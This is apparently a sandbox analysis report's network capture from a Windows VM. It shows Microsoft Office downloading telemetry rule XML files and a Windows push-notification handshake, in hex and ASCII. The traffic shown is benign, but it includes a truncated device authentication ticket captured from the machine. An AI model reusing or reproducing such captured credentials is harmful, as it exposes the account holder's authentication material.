                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 947c7cf8-001e-00a2-018c-3ad4d5000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095417Z-185f5d8b95cjbkr4hC1NYCeu2400000009tg00000000gh12
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      24192.168.2.64973313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095417Z-1777c6cb754lv4cqhC1TEB13us00000009a000000000g0gx
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      25192.168.2.64973213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095417Z-185f5d8b95csd4bwhC1NYCq7dc0000000a2g000000001qz9
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      26192.168.2.64973413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095417Z-1777c6cb7544n7p6hC1TEByvb400000009f000000000f2nf
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      27192.168.2.64973640.115.3.253443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 6e 6b 49 61 56 57 74 70 45 61 69 73 57 72 6d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 34 30 36 62 34 65 37 39 37 32 64 61 35 61 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: bnkIaVWtpEaisWrm.1Context: 14406b4e7972da5a
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 6e 6b 49 61 56 57 74 70 45 61 69 73 57 72 6d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 34 30 36 62 34 65 37 39 37 32 64 61 35 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 66 61 45 58 74 6d 6c 36 59 73 6a 75 35 41 33 6b 48 47 6f 58 69 47 55 63 59 75 77 47 4c 4e 34 6c 56 75 74 39 70 4e 31 6f 63 52 6d 6f 67 45 58 48 76 30 43 54 44 49 7a 32 30 57 79 45 4c 63 41 67 53 57 68 59 79 71 30 4b 71 2f 35 57 54 4c 68 4f 30 6a 56 63 32 53 6d 45 6a 4a 31 48 6d 4c 30 36 45 6d 4d 32 6c 67 35 71 39 71 48 2f
                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bnkIaVWtpEaisWrm.2Context: 14406b4e7972da5a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAefaEXtml6Ysju5A3kHGoXiGUcYuwGLN4lVut9pN1ocRmogEXHv0CTDIz20WyELcAgSWhYyq0Kq/5WTLhO0jVc2SmEjJ1HmL06EmM2lg5q9qH/
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 6e 6b 49 61 56 57 74 70 45 61 69 73 57 72 6d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 34 30 36 62 34 65 37 39 37 32 64 61 35 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: bnkIaVWtpEaisWrm.3Context: 14406b4e7972da5a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC58INData Raw: 4d 53 2d 43 56 3a 20 66 64 61 36 72 45 7a 52 30 55 43 35 53 5a 4a 31 77 50 76 41 76 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: fda6rEzR0UC5SZJ1wPvAvg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      28192.168.2.64973713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 499
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                      x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095418Z-r1d97b9957747b9jhC1TEBgyec00000008qg00000000cxpr
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      29192.168.2.64974113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 657669b3-a01e-0002-118c-3a5074000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095418Z-185f5d8b95cdh56ghC1NYCk1x400000003y00000000056ek
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      30192.168.2.64973913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 7f65af6f-801e-0067-5f8c-3afe30000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095418Z-185f5d8b95c96jn4hC1NYCbgp80000000a50000000000x1z
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      31192.168.2.64973813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5815C4C"
